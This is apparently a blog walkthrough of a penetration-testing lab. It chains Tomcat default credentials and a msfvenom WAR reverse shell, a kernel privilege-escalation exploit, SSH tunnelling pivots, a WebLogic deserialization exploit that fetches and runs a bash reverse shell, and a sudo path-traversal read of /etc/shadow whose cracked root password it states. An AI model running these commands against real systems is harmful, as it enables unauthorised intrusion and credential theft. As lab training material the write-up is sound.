PT Exercise




Let’s start the fun by doing an nmap scan on our Victim machine


we found multiple services running including apache, netbios ,nfs share and Tomcat. When ever i find tomcat , i always think of Tomcat Default Credential and uploading war file exploit.

Exploit Scenario

first i tried to visit and try tomcat:tomcat credentials and i could connect to the manager interface

ConnectTo Manager.png

next i created a war file payload using msfvenom to get a reverse shell that connects to my attacker machine on port 4443 on the server and named the file webshell.war

msfvenom -p linux/x86/shell_reverse_tcp LHOST= LPORT=4443 -f war > webshell.war


Next we have to get the name of the jsp file to execute, we can use jar -tf webshell.war


next we have to listen on port 4443 and then execute

wget or visit the url from our browser.

and we will get a shell on our first victim with user tomcat7TomCatRCE.png

Privilege Escalation

once i get a shell and want to do privilege escalation i always check what commands i can execute with sudo as a root.sudo Command 1st Machine.png

unfortunately i can’t execute any commands using sudo. let’s try to check the version using uname -v

uname Version.png

Doing some Google foo you can find that it’s vulnerable to privilege escalation exploit so we can get exploit from internet 39166.c

first i have to get the exploit code to the victim machine so i ran a python http server using command python -m SimpleHTTPServer which will run on port 8000, and the run wget from our reverse shell connection to get the code and put it inside /tmp


finally we compile the code and run the exploit and voila we got a root shell shell.



first let’s try to run ifconfig to check if our victim is connected to another network.


we can find that it has another IP, now we have to find a way to use this machine as a pivot and connect to the other network, reading an article from how Hacking got hacked i remembered a technique to do this using ssh dynamic tunneling and proxychains

so first i started the ssh daemon as from nmap results there was no ssh running and also i  changed the root password in order to be able to establish an ssh session.

Starting SSH.png

next i did the below command which create what is called a dynamic tunnel using -D option.

ssh -D 9090 root@

SSH Dynamic Tunneling Command.png

Once the ssh session is started the tunnel is up on port 9090. so next let’s configure proxychains to use this portProxyChainsConf.png

and we can run proxychains before any command while we are trying to connect to any ip in subnet.

next we can run our nmap ping sweep using proxychains , so proxychains will utilize the ssh tunnel created on port 9090 to reach the subnet. so by executing sudo proxychains nmap -Pn

Ping Sweep.png

by excluding and Specific IP’s) we can conclude that our next victim will be

let’s nmap this host using proxychainsNmap using ProxyChains 2nd Machine.png

we found two ports open, first i wanted to browse to port 7001 using my browser, unfortunately proxychains can’t do that. so the solution was to create a Local SSH Tunnel to be able to connect to port 7001, so doing ssh -L 7000: root@ means that we can connect to localhost 7000 and the traffic will be tunneled to our victim port 7001.


next from browser we can visit http://localhost:7000 and we can find it’s oracle weblogic.


Weblogic is an oracle application Middleware which is usually used to connect applications with each others using servlets and other techniques.

doing some google foo we can find that it’s vulnerable to java deserialization Exploit which can lead to RCE.

i found many topics on how to exploit java deserialization vulnerabilities in oracle weblogic including this.

The only challenge was how to get a reverse shell from the other victim while it’s not in our network.

again we can use SSH Tunneling but this time Remote SSH Tunneling.

we need a remote tunnel which will be used to connect back to our Linux Mint Attacker Machine on port 4444

so first we created our exploit bash reverseshell script, the below script when executed will make a reverse shell connection to our first victim on port 8888BashReverseCode.png

so we have to create a remote tunnel that forwards all requests to 8888 to 4444 on our machine. ssh -R root@

this command once ssh connection is established between attacker machine and 1st victim machine will create a listener on the 1st Victim machine on port 8888 , any connection to this port will get forwarded to attacker machine on port 4444


but now how can we get this bash script to the vulnerable weblogic server. the solution is to host it on our python SimpleHTTPServer on port 8000 and create another remote tunnel to my webserver using

ssh -R root@ Code.png

so let’s now exploit the Weblogic java deserialization vulnerability.

let’s use the exploit code from This blog

python [Victim Machine and port] [location of ysoserial tool which generate java payloads] [command to execute]

python localhost  7000 ../ysoserial-0.0.2-all.jar ‘wget’

so connecting to will basically connect to our machine on port 8000 which is the python HTTP Webserver

WebLogicExploitGetBash Code.png

and from webserver python logs we can find that a GET request is there to get the bash file which means that our exploit is succeeding , the only thing missing is to execute the script.


so now let’s run the exploit code , which will get a reverse connection to which will be tunneled to using the command

ssh -R root@

and also we have to create our listener on port 4444

finally when we executes python localhost  7000 ../ysoserial-0.0.2-all.jar ‘sh’  and we will get ourselves a shell.

listner and shell.png

Miss configuration to root

as always when get a shell i try to find which commands i can run as root using sudo.

Sudo 2nd Machine.png

i can find that i can run /bin/cat /root/backup/*

great that is a miss configuration which we can take advantage of. we can use sudo to cat /root/backup and then go Two directories back and basically cat any file we want in root.

so let’s cat the shadow file using

sudo /bin/cat /root/backup../../etc/shadow


and finally I cracked the root password using John the ripper which was mario101Cracked.png

Thanks hope you enjoyed reading




Leave a Reply

Your email address will not be published. Required fields are marked *